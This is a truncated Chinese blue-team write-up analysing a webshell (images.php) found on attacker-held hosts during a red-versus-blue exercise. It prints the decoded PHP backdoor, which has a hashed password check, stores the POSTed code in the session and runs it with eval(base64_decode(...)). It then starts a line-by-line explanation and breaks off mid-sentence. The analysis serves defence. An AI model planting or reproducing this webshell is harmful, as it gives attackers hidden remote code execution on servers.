对某攻击队的Webshell进行分析

背景在攻防演练过程中，作为蓝队成员除了日常的防守任务以外还可以通过其他的手段进行对攻击队的反打。我方蓝队成员对已拿下攻击方⾁鸡的⽇志、⽂件等内容的分析，发现⼤部分肉鸡的网站根目录都存在 images.php，提取该文件的内容并分析。images.php 文件内容分析提出较为重要的那一段base64decode后的PHP代码进行分析：@session_start();//开启sessionif(isset($_POST['code']))substr(sha1(md5($_POST['a'])),36)=='222f'&&$_SESSION['theCode']=$_POST['code'];if(isset($_SESSION['theCode']))@eval(base64_decode($_SESSION['theCode']));代码逻辑A.判断POST请求参数code是否有值B.当满足条件时则执行如下代码substr(sha1(md5($_POST['a'])),36)=='222f'&&$_SESSION['theCode']=$_POST['code']C.这段代码的意思为将POST请求参数a的值进行md5加密再进行sha1加 ………………………………